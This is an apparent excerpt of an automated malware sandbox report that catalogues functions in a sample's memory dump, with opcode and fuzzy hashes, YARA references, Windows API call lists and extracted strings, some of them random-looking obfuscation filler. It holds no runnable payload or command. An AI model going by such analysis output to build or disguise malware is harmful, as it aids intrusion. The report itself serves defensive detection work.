Instruction Fuzzy Hash: FE912DB14083419FC758DF25C58941BFBF5BB95B08F008A2DF29696260D7B18A09CF82

Uniqueness

Uniqueness Score: -1.00%

Function 00A633A9, Relevance: 1.4, Strings: 1, Instructions: 170COMMON

Download Yara Rule

Strings

&-, xrefs: 00A63483

Memory Dump Source

Source File: 00000000.00000002.642951852.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true

Yara matches

Similarity

API ID:
String ID: &-
API String ID: 0-1647332301
Opcode ID: ab7ab626680ed9ed5358e8aeef2ad6fba64cc8ed35add6d790a61d30f9ed89f6
Instruction ID: 3607897f9f5182231d9bfb19e4cf14e33f010af28d2c4cc228d6ef746f6ba870
Opcode Fuzzy Hash: ab7ab626680ed9ed5358e8aeef2ad6fba64cc8ed35add6d790a61d30f9ed89f6
Instruction Fuzzy Hash: 407154714083819FCB58CF64C88A55FBFF1BBD5398F504A1DF19656260D3B58A4ACF82

Uniqueness

Uniqueness Score: -1.00%

Function 00A67D87, Relevance: 1.4, Strings: 1, Instructions: 140COMMON

Download Yara Rule

Strings

]1, xrefs: 00A67DE5

Memory Dump Source

Source File: 00000000.00000002.642951852.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true

Yara matches

Similarity

API ID:
String ID: ]1
API String ID: 0-3136993215
Opcode ID: d7e4a39e9e5c26ff6825bbd63b05b5f75ece3416f93472cf8e37b08cdd133fa2
Instruction ID: 567222005fe946046950b9a3f053bf8854f151b39c88e52247fe15e4538cb4a9
Opcode Fuzzy Hash: d7e4a39e9e5c26ff6825bbd63b05b5f75ece3416f93472cf8e37b08cdd133fa2
Instruction Fuzzy Hash: B851403200D341ABC358CF65D98A81FBAF6FBD4798F404A0DF59292260C7B1CA49CB82

Uniqueness

Uniqueness Score: -1.00%

Function 00A82560, Relevance: 1.4, Strings: 1, Instructions: 120COMMON

Download Yara Rule

Strings

){, xrefs: 00A825AA

Memory Dump Source

Source File: 00000000.00000002.642951852.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true

Yara matches

Similarity

API ID:
String ID: ){
API String ID: 0-1738580931
Opcode ID: 4c27470c79ad73ccb5f55289d0ed3a651ff421185eb5969a21ce754adb2516a2
Instruction ID: d28e15111dea095841893d7293cc59271b1f032ded173630b3aeea8417d73c8e
Opcode Fuzzy Hash: 4c27470c79ad73ccb5f55289d0ed3a651ff421185eb5969a21ce754adb2516a2
Instruction Fuzzy Hash: 764156716083019FC718DF21D98692FBBE1FBC8748F00892DF48696261D775CA1A8F93

Uniqueness

Uniqueness Score: -1.00%

Function 00A64F42, Relevance: 1.4, Strings: 1, Instructions: 118COMMON

Download Yara Rule

Strings

B;}, xrefs: 00A64FA4

Memory Dump Source

Source File: 00000000.00000002.642951852.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true

Yara matches

Similarity

API ID:
String ID: B;}
API String ID: 0-3368358345
Opcode ID: b5cc543b474a394f271402216d1852f1482b1b150657cb58054f737eacc59c5d
Instruction ID: 3b8143c5f837a4823a089e7aa59d39f0e281a64f60ebf0f96337ca67630dc27c
Opcode Fuzzy Hash: b5cc543b474a394f271402216d1852f1482b1b150657cb58054f737eacc59c5d
Instruction Fuzzy Hash: 805102715083419FC759CF26C98A82BBBF1FBC9748F544A0CF5A696220D3B1CA198F87

Uniqueness

Uniqueness Score: -1.00%

Function 00A6635F, Relevance: 1.4, Strings: 1, Instructions: 111COMMON

Download Yara Rule

Strings

N, xrefs: 00A66401

Memory Dump Source

Source File: 00000000.00000002.642951852.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true

Yara matches

Similarity

API ID:
String ID: N
API String ID: 0-3948818596
Opcode ID: 36e90f4d2d8bce284f2561ecaf7bab2ddf48de27cfd66f72c3a763bc84aa1489
Instruction ID: 98eb0785090c768b39d18ea5e41ce0864ab409e33990bc6cad271c807df1aa18
Opcode Fuzzy Hash: 36e90f4d2d8bce284f2561ecaf7bab2ddf48de27cfd66f72c3a763bc84aa1489
Instruction Fuzzy Hash: 1641A7711083829BC758CF25D69942FBAF1FBD4748F104A2EF596A6260D7B58A09CF83

Uniqueness

Uniqueness Score: -1.00%

Function 00A6F699, Relevance: 1.4, Strings: 1, Instructions: 104COMMON

Download Yara Rule

Strings

C|, xrefs: 00A6F7A4

Memory Dump Source

Source File: 00000000.00000002.642951852.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true

Yara matches

Similarity

API ID:
String ID: C|
API String ID: 0-2444742693
Opcode ID: ed0f62a632d906fb3c43c3fe32992958e3bbf5cf354087c936e85217c67f69d2
Instruction ID: b13661867cde842a4c5a1b34dc6ddc17b6913f8a01d71a2eaf38afca3c224668
Opcode Fuzzy Hash: ed0f62a632d906fb3c43c3fe32992958e3bbf5cf354087c936e85217c67f69d2
Instruction Fuzzy Hash: 4041E271E01208EBCF08CFA6D98A8DEBFB6EB84314F20C09AE015AB250D7B55B55DF50

Uniqueness

Uniqueness Score: -1.00%

Function 00A6DD66, Relevance: 1.3, Strings: 1, Instructions: 92COMMON

Download Yara Rule

Strings

CCP, xrefs: 00A6DDC8

Memory Dump Source

Source File: 00000000.00000002.642951852.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true

Yara matches

Similarity

API ID:
String ID: CCP
API String ID: 0-1034069945
Opcode ID: 3e59c4399d6a2cb82ee090332a18dd5b708fd5e2eadda935f09b0a5565451fd9
Instruction ID: 6afec5a0bf75dc1fad492104827b2ef5afc833c7be9cefd02ce33f910213092a
Opcode Fuzzy Hash: 3e59c4399d6a2cb82ee090332a18dd5b708fd5e2eadda935f09b0a5565451fd9
Instruction Fuzzy Hash: 7441F1B2C0031DABCF59DFE0C94A8EEBBB4FB24304F108198D511B6220E3B51A45DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A654C0, Relevance: 1.3, Strings: 1, Instructions: 84COMMON

Download Yara Rule

Strings

2+]X, xrefs: 00A654F8

Memory Dump Source

Source File: 00000000.00000002.642951852.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true

Yara matches

Similarity

API ID:
String ID: 2+]X
API String ID: 0-635157736
Opcode ID: 481d722715983e272cc469dc43216b96c655eaa670e4ddf9da5fb0d9274d257e
Instruction ID: 4d3acac108746740865f6564d0ea48e6a31d00df63507ff870f3169b57bca708
Opcode Fuzzy Hash: 481d722715983e272cc469dc43216b96c655eaa670e4ddf9da5fb0d9274d257e
Instruction Fuzzy Hash: A4318A72A293519BC314CF28C88595AFBE0EF98714F454A2DE886A7242D770E909CB92

Uniqueness

Uniqueness Score: -1.00%

Function 00A78518, Relevance: 1.3, Strings: 1, Instructions: 82COMMON

Download Yara Rule

Strings

g, xrefs: 00A7853E

Memory Dump Source

Source File: 00000000.00000002.642951852.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true

Yara matches

Similarity

API ID:
String ID: g
API String ID: 0-1037297435
Opcode ID: 12f60b9f080022c690087f5a0feae30e1c4340ffe80795349f84256cb1c1a91f
Instruction ID: 54e7a56350bea980714496e49a9cc97403251ab956d48be5e16594dde772f017
Opcode Fuzzy Hash: 12f60b9f080022c690087f5a0feae30e1c4340ffe80795349f84256cb1c1a91f
Instruction Fuzzy Hash: D221AD726083008FC754DF2AD98561BB7E6EFC8718F04CA2DF499D3254DBB4D9058B92

Uniqueness

Uniqueness Score: -1.00%

Function 00A8314A, Relevance: 1.3, Strings: 1, Instructions: 63COMMON

Download Yara Rule

Strings

BGd, xrefs: 00A831BE

Memory Dump Source

Source File: 00000000.00000002.642951852.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true

Yara matches

Similarity

API ID:
String ID: BGd
API String ID: 0-2042166335
Opcode ID: a72e445dec8ea7b5338fe7369db8ed5e1fb3125761641ecec233543bdc38b076
Instruction ID: c9aeeb0254da38e815c08af19299df28dabece1c1b94649a68ab7ec7c37ca984
Opcode Fuzzy Hash: a72e445dec8ea7b5338fe7369db8ed5e1fb3125761641ecec233543bdc38b076
Instruction Fuzzy Hash: 8D211FB6D0020EEBCF14CFA5DA4A8EEFBB5EB44304F248199D921B6260D3B44B05DF90

Uniqueness

Uniqueness Score: -1.00%

Function 00A6F20D, Relevance: 1.3, Strings: 1, Instructions: 61COMMON

Download Yara Rule

Strings

PGX, xrefs: 00A6F2D8

Memory Dump Source

Source File: 00000000.00000002.642951852.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true

Yara matches

Similarity

API ID:
String ID: PGX
API String ID: 0-1232467878
Opcode ID: 7e4dc62b25448ff4b858d7da28ae992b3987ae09df61079560597edfc683765a
Instruction ID: a120e22e51ec3421f492c6db6b8c2d1dc94a9a763868ad126a04f76a0f5257f7
Opcode Fuzzy Hash: 7e4dc62b25448ff4b858d7da28ae992b3987ae09df61079560597edfc683765a
Instruction Fuzzy Hash: AD31CD71D0124EEFCB08DFE1D64A4AEFBB1BB40308F208198D522B6260D7B45B5ADF90

Uniqueness

Uniqueness Score: -1.00%

Function 6EA838C0, Relevance: .5, Instructions: 489COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.643198408.000000006EA81000.00000020.00020000.sdmp, Offset: 6EA80000, based on PE: true

Associated: 00000000.00000002.643166858.000000006EA80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643245244.000000006EAAA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643279187.000000006EADD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.643286673.000000006EADF000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.643293057.000000006EAE0000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 15fe81b6bf96d90c52d081125c3682903769580d4e2c48ca934145b7225bff49
Instruction ID: 9495842b00b3f77f4fdf0ff9b2823d1a0519bdf691be2afe2c10556af0b7fb58
Opcode Fuzzy Hash: 15fe81b6bf96d90c52d081125c3682903769580d4e2c48ca934145b7225bff49
Instruction Fuzzy Hash: BC020171A187158FD305DE7EC49422BB7E2AFDA300F15CB2EE885A7250E770AC898785

Uniqueness

Uniqueness Score: -1.00%

Function 00A66125, Relevance: .1, Instructions: 144COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.642951852.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70a86c6179f76de80c01e641940645ae054664014b9855e8fb0c584db86cb441
Instruction ID: d0db4ae67fc7ba8d7856d3e5b4bbe1784288e4caaba3103efa66cfb616ef69c9
Opcode Fuzzy Hash: 70a86c6179f76de80c01e641940645ae054664014b9855e8fb0c584db86cb441
Instruction Fuzzy Hash: 776121B1D01209EBCF08CFA5D98A9EEFBB2FB58314F208059E511B6260D7B51A55CF54

Uniqueness

Uniqueness Score: -1.00%

Function 00A65166, Relevance: .1, Instructions: 113COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.642951852.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e859e7833dbbff98f9603b4a31dd98bbef44b180222ad395fb35deda421b24ab
Instruction ID: d037cb42005770ba02896381ab919cc6de31656a10d8598a4cbe59ae3060f00b
Opcode Fuzzy Hash: e859e7833dbbff98f9603b4a31dd98bbef44b180222ad395fb35deda421b24ab
Instruction Fuzzy Hash: A8418CB1A087418BC758CF34D99542FBBF5FBD4748F100A2DF186A6261D775CA488B83

Uniqueness

Uniqueness Score: -1.00%

Function 00A7E478, Relevance: .1, Instructions: 99COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.642951852.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62ab12a5c1461a32f5a8ea1cbf4c6ec33fc28f1ed6bb483b06b937df58032f48
Instruction ID: 5ff62301ea20af997d5ce720b65f80b0f3ffe65aa740d0679c3370b5aaa0ee3f
Opcode Fuzzy Hash: 62ab12a5c1461a32f5a8ea1cbf4c6ec33fc28f1ed6bb483b06b937df58032f48
Instruction Fuzzy Hash: 7F4102B1C0021DABCF45DFE4C98A8EEBBB5FF48348F508548E521B6210D3B94A45DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00A80AD3, Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.642951852.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 49e848d9c6b67677fafb526c596923f40c93afa7d7e2a42ad7033b1c7560134e
Instruction ID: 2bee8b93c0bf51ab534bed10de41d54d131099b00eb3e84e204e158b39576d72
Opcode Fuzzy Hash: 49e848d9c6b67677fafb526c596923f40c93afa7d7e2a42ad7033b1c7560134e
Instruction Fuzzy Hash: 98319C72A183119FC350DF29C48555AF7E0EF88324F819A2DF89A97250E7B4E909CF92

Uniqueness

Uniqueness Score: -1.00%

Function 00A6F4A5, Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.642951852.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f917a21857e069ae4f5e9ce3a5c3e1581ac60002df01cf4a9c5306305f90ad12
Instruction ID: 601688c0a8c28b767b9a1dd243940ab8af7adb32067b114d6afce25f2be281f2
Opcode Fuzzy Hash: f917a21857e069ae4f5e9ce3a5c3e1581ac60002df01cf4a9c5306305f90ad12
Instruction Fuzzy Hash: 7F312171D0031AAFEB08CFA1D94A9EEBBB1FB40704F208069D511BB250D7B95A55CF90

Uniqueness

Uniqueness Score: -1.00%

Function 00A6F984, Relevance: .1, Instructions: 85COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.642951852.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f1ff426e79746ad319983153294732274ee39d0f6843496e681fd78a0ea1dbe7
Instruction ID: 4012fb9d8a2bb02ee737ef2e5a44e005ba2f5a43705dda54326285454359a3ee
Opcode Fuzzy Hash: f1ff426e79746ad319983153294732274ee39d0f6843496e681fd78a0ea1dbe7
Instruction Fuzzy Hash: BE31F6B290020CAFEB04DFA9DD89CEEBBB9EB48318F018159F918A6250D3759E159F50

Uniqueness

Uniqueness Score: -1.00%

Function 00A6938F, Relevance: .1, Instructions: 78COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.642951852.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 41fb78f267175e101537b1da63eb1f95f6ffa96ed1ea6f3c6d98e9dded9ba910
Instruction ID: b441d4946173db8aaf5661b1fa2e004e5facbc2213e84376fb54b25aefbe6ecd
Opcode Fuzzy Hash: 41fb78f267175e101537b1da63eb1f95f6ffa96ed1ea6f3c6d98e9dded9ba910
Instruction Fuzzy Hash: 6E31D232900209BBDF05DEA5CD068DEBFB6FF49314F108589FA25A6160D3B68A61EB50

Uniqueness

Uniqueness Score: -1.00%

Function 00A82C16, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.642951852.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ee398f73e3bd3737d3a0f46f012eb34d36fe675d243cd443379ab18b292edab
Instruction ID: 707dd56a26aa5a0bb2bcbc62da59c4f7072c53e354df8aaf3cb46b51d0416858
Opcode Fuzzy Hash: 8ee398f73e3bd3737d3a0f46f012eb34d36fe675d243cd443379ab18b292edab
Instruction Fuzzy Hash: 673103B1D0130EABCB48CFE5DA4A8EEBBB1FB44314F208199D511B6260D3B55B55CF91

Uniqueness

Uniqueness Score: -1.00%

Function 00A6E259, Relevance: .1, Instructions: 70COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.642951852.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f306290c89833e0bc14cfd63dcada7925a641137887b04603cec1842d07f268
Instruction ID: 394f483473546a5c5307b58746343857bc302f98cfa48b9f712b2a7cfeb699be
Opcode Fuzzy Hash: 5f306290c89833e0bc14cfd63dcada7925a641137887b04603cec1842d07f268
Instruction Fuzzy Hash: 76212AB1D0020CBFDB14DFE5C88A8EEBFB9FF48358F108198E51466250D3B99A559F91

Uniqueness

Uniqueness Score: -1.00%

Function 00A65314, Relevance: .0, Instructions: 50COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.642951852.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 137f8063ab8a4e6c48daa6564079e0f37c3fb48828de76ab16e4e7a031f92ad0
Instruction ID: 2c8a504f256c8a06c7c6ba0890bf29fa2d77db6ebe2d49e68f3c0099061bb632
Opcode Fuzzy Hash: 137f8063ab8a4e6c48daa6564079e0f37c3fb48828de76ab16e4e7a031f92ad0
Instruction Fuzzy Hash: 1E21F4B1D1030DEBDB18CFE5D94A4AEBBF1BF10718F208189E414A6240D7B85B18CF54

Uniqueness

Uniqueness Score: -1.00%

Function 6EA9BFE0, Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.643198408.000000006EA81000.00000020.00020000.sdmp, Offset: 6EA80000, based on PE: true

Associated: 00000000.00000002.643166858.000000006EA80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643245244.000000006EAAA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643279187.000000006EADD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.643286673.000000006EADF000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.643293057.000000006EAE0000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6ba7b54f6c6c970e54d4c15b88478b704ef447b4e099ec38077e20cd387e74fb
Instruction ID: bb9e67cb4564019065896afda9e283d1c868c20a29a47723473243dc6658299a
Opcode Fuzzy Hash: 6ba7b54f6c6c970e54d4c15b88478b704ef447b4e099ec38077e20cd387e74fb
Instruction Fuzzy Hash: D1016931321A018FD748CF68C4A0B29B3E2BF45788F9A45A9D4128F755DB30EC80EB48

Uniqueness

Uniqueness Score: -1.00%

Function 6EAA298C, Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.643198408.000000006EA81000.00000020.00020000.sdmp, Offset: 6EA80000, based on PE: true

Associated: 00000000.00000002.643166858.000000006EA80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643245244.000000006EAAA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643279187.000000006EADD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.643286673.000000006EADF000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.643293057.000000006EAE0000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6eb6665ddb3350983e42d1cbc670fa1f7b7e34ee61cedf1b9ad9aa5777005a93
Instruction ID: fc0f000edcc793d26a73c0765c71078a9ee12bb8f8b6ad3aeb1dac3bd93c1f1c
Opcode Fuzzy Hash: 6eb6665ddb3350983e42d1cbc670fa1f7b7e34ee61cedf1b9ad9aa5777005a93
Instruction Fuzzy Hash: 51E04632911228EBCB21CFCD8A0098AB3ACEB49A00B51089AB601E3200C2B4DE40C7D4

Uniqueness

Uniqueness Score: -1.00%

Function 6EAA12CB, Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.643198408.000000006EA81000.00000020.00020000.sdmp, Offset: 6EA80000, based on PE: true

Associated: 00000000.00000002.643166858.000000006EA80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643245244.000000006EAAA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643279187.000000006EADD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.643286673.000000006EADF000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.643293057.000000006EAE0000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8280ca142bc1b3d81a1ec9e0318d957c7d25c74bfd8627c95e038b2adada9f26
Instruction ID: a835726e0c955ebbc06b27bba8bddffd17e74ec1eb8cf7fdc9d2ceb8cdb1551b
Opcode Fuzzy Hash: 8280ca142bc1b3d81a1ec9e0318d957c7d25c74bfd8627c95e038b2adada9f26
Instruction Fuzzy Hash: C2C08C74000B0056CE198AD88270BB4336EE3A5B82F8C089CCA028B681C71EDCCFD618

Uniqueness

Uniqueness Score: -1.00%

Function 00A74315, Relevance: .0, Instructions: 2COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.642951852.0000000000A60000.00000040.00000010.sdmp, Offset: 00A60000, based on PE: true

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction ID: 25aae2582423029eb19f4489c776d3d70638aac6ce1da4afce0c8a8e650509f3
Opcode Fuzzy Hash: 6cae658f33ca92bcc76ffcd72798f6487763aeebc788fd534dd3d52e563a93f0
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 6EA8DD30, Relevance: 42.5, APIs: 19, Strings: 5, Instructions: 451memorylibraryloaderCOMMON

Download Yara Rule

APIs

SetLastError.KERNEL32(00000000), ref: 6EA8DE42
GetCurrentDirectoryW.KERNEL32(?,?), ref: 6EA8DE4A
GetLastError.KERNEL32 ref: 6EA8DE56
GetLastError.KERNEL32 ref: 6EA8DE68
GetLastError.KERNEL32 ref: 6EA8DECC
HeapFree.KERNEL32(00000000,00000000), ref: 6EA8DEFD
HeapFree.KERNEL32(00000000,?), ref: 6EA8DF47
HeapFree.KERNEL32(00000000,?), ref: 6EA8DF58
GetCurrentProcess.KERNEL32(?), ref: 6EA8E031
GetCurrentThread.KERNEL32 ref: 6EA8E039
RtlCaptureContext.KERNEL32(?), ref: 6EA8E059
GetProcAddress.KERNEL32(SymFunctionTableAccess64,?), ref: 6EA8E09A
GetProcAddress.KERNEL32(SymGetModuleBase64), ref: 6EA8E0C4
GetCurrentProcess.KERNEL32 ref: 6EA8E0D9
GetProcAddress.KERNEL32(StackWalkEx), ref: 6EA8E0FB
ReleaseMutex.KERNEL32(?), ref: 6EA8E1E8
HeapFree.KERNEL32(00000000,?), ref: 6EA8E26B
HeapFree.KERNEL32(00000000,?,?), ref: 6EA8E29D
GetProcAddress.KERNEL32(StackWalk64), ref: 6EA8E345

Strings

called `Option::unwrap()` on a `None` value, xrefs: 6EA8E3CC, 6EA8E3EF, 6EA8E412
SymGetModuleBase64, xrefs: 6EA8E0B9
StackWalkEx, xrefs: 6EA8E0F0
SymFunctionTableAccess64, xrefs: 6EA8E08F
StackWalk64, xrefs: 6EA8E33A

Memory Dump Source

Source File: 00000000.00000002.643198408.000000006EA81000.00000020.00020000.sdmp, Offset: 6EA80000, based on PE: true

Associated: 00000000.00000002.643166858.000000006EA80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643245244.000000006EAAA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643279187.000000006EADD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.643286673.000000006EADF000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.643293057.000000006EAE0000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeap$AddressCurrentErrorLastProc$Process$CaptureContextDirectoryMutexReleaseThread
String ID: StackWalk64$StackWalkEx$SymFunctionTableAccess64$SymGetModuleBase64$called `Option::unwrap()` on a `None` value
API String ID: 1381040140-1036201984
Opcode ID: 4efeab568c1d5ba57d8d570fb07c041976a7852b99df0688bd6357552bf01778
Instruction ID: b0da0dc5093d4bddee5e5b2ad3c969b26d27d76944b81cc220fa9ee4a17f5bd4
Opcode Fuzzy Hash: 4efeab568c1d5ba57d8d570fb07c041976a7852b99df0688bd6357552bf01778
Instruction Fuzzy Hash: EF1248B0600B00DFE761CFA5C994B93BBF5BB09308F14891DE59A8B690D771B889CF55

Uniqueness

Uniqueness Score: -1.00%

Function 6EA8C700, Relevance: 32.0, APIs: 14, Strings: 4, Instructions: 477memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 6EA8D000: TlsGetValue.KERNEL32(00000000,00000001,6EA8C746), ref: 6EA8D00B
Part of subcall function 6EA8D000: TlsGetValue.KERNEL32(00000000), ref: 6EA8D043

AcquireSRWLockShared.KERNEL32(6EADE11C), ref: 6EA8C785
HeapFree.KERNEL32(00000000,00000000), ref: 6EA8C8DC
HeapFree.KERNEL32(00000000,?), ref: 6EA8C8EA
TlsGetValue.KERNEL32(00000000), ref: 6EA8C94D
TlsGetValue.KERNEL32(00000000), ref: 6EA8CA47
HeapFree.KERNEL32(00000000,00000000), ref: 6EA8CB31
HeapFree.KERNEL32(00000000,?), ref: 6EA8CB3F
GetProcessHeap.KERNEL32 ref: 6EA8CC18
HeapAlloc.KERNEL32(00B70000,00000000,00000010), ref: 6EA8CC2B
TlsSetValue.KERNEL32(00000000,00000000,00B70000,00000000,00000010), ref: 6EA8CC9C
HeapFree.KERNEL32(00000000,00000000,00B70000,00000000,00000010), ref: 6EA8CD1D

Strings

full, xrefs: 6EA8CCF8
Box<dyn Any><unnamed>thread '' panicked at '', , xrefs: 6EA8CC00
already borrowedC:cmfltobzsqiwzwswifceeeiuunqkihdnyjizwfcsrqtsqkmwekwaanfzackndqagesnhktvjovmkrgyplrusstvgwloxgtnnoxmtpmkzzsudqjpdkuwbmncfcubd, xrefs: 6EA8CBE1
cannot access a Thread Local Storage value during or after destructionC:kqwvpwvvlwjdcfhskugiowpmgqvcpfwggcvmmylhvkfknbiwgoixhewssvmqfpwemyruhmqomiebebgwzyjtgnzgjfkbtcehpwhopimlufuwcaldobojssciqoa, xrefs: 6EA8C74D, 6EA8C7C8

Memory Dump Source

Source File: 00000000.00000002.643198408.000000006EA81000.00000020.00020000.sdmp, Offset: 6EA80000, based on PE: true

Associated: 00000000.00000002.643166858.000000006EA80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643245244.000000006EAAA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643279187.000000006EADD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.643286673.000000006EADF000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.643293057.000000006EAE0000.00000002.00020000.sdmp Download File

Similarity

API ID: Heap$FreeValue$AcquireAllocLockProcessShared
String ID: Box<dyn Any><unnamed>thread '' panicked at '', $already borrowedC:cmfltobzsqiwzwswifceeeiuunqkihdnyjizwfcsrqtsqkmwekwaanfzackndqagesnhktvjovmkrgyplrusstvgwloxgtnnoxmtpmkzzsudqjpdkuwbmncfcubd$cannot access a Thread Local Storage value during or after destructionC:kqwvpwvvlwjdcfhskugiowpmgqvcpfwggcvmmylhvkfknbiwgoixhewssvmqfpwemyruhmqomiebebgwzyjtgnzgjfkbtcehpwhopimlufuwcaldobojssciqoa$full
API String ID: 2275035175-262129955
Opcode ID: 3c33ad3bcbf520c790ed78dcda1a5faa3301f8fabdee2f2c995756da606a7bdf
Instruction ID: 1d2dedecf9fa869aa15dd49f90efbb8f0a7120b29440f1a887ba14f21fe86c50
Opcode Fuzzy Hash: 3c33ad3bcbf520c790ed78dcda1a5faa3301f8fabdee2f2c995756da606a7bdf
Instruction Fuzzy Hash: DF1247B0E00219CFEB10CFE4C954B8EBBB5BF49304F248669D415AF240D775A886CF9A

Uniqueness

Uniqueness Score: -1.00%

Function 6EA8C6D0, Relevance: 24.9, APIs: 12, Strings: 2, Instructions: 409memoryCOMMON

Download Yara Rule

APIs

Part of subcall function 6EA8C700: AcquireSRWLockShared.KERNEL32(6EADE11C), ref: 6EA8C785

HeapFree.KERNEL32(00000000,00000000), ref: 6EA8C8DC
HeapFree.KERNEL32(00000000,?), ref: 6EA8C8EA
TlsGetValue.KERNEL32(00000000), ref: 6EA8C94D
HeapFree.KERNEL32(00000000,00000000), ref: 6EA8CB31
HeapFree.KERNEL32(00000000,?), ref: 6EA8CB3F

Strings

Box<dyn Any><unnamed>thread '' panicked at '', , xrefs: 6EA8CC00
cannot access a Thread Local Storage value during or after destructionC:kqwvpwvvlwjdcfhskugiowpmgqvcpfwggcvmmylhvkfknbiwgoixhewssvmqfpwemyruhmqomiebebgwzyjtgnzgjfkbtcehpwhopimlufuwcaldobojssciqoa, xrefs: 6EA8C74D, 6EA8C7C8

Memory Dump Source

Source File: 00000000.00000002.643198408.000000006EA81000.00000020.00020000.sdmp, Offset: 6EA80000, based on PE: true

Associated: 00000000.00000002.643166858.000000006EA80000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643245244.000000006EAAA000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.643279187.000000006EADD000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.643286673.000000006EADF000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.643293057.000000006EAE0000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeap$AcquireLockSharedValue
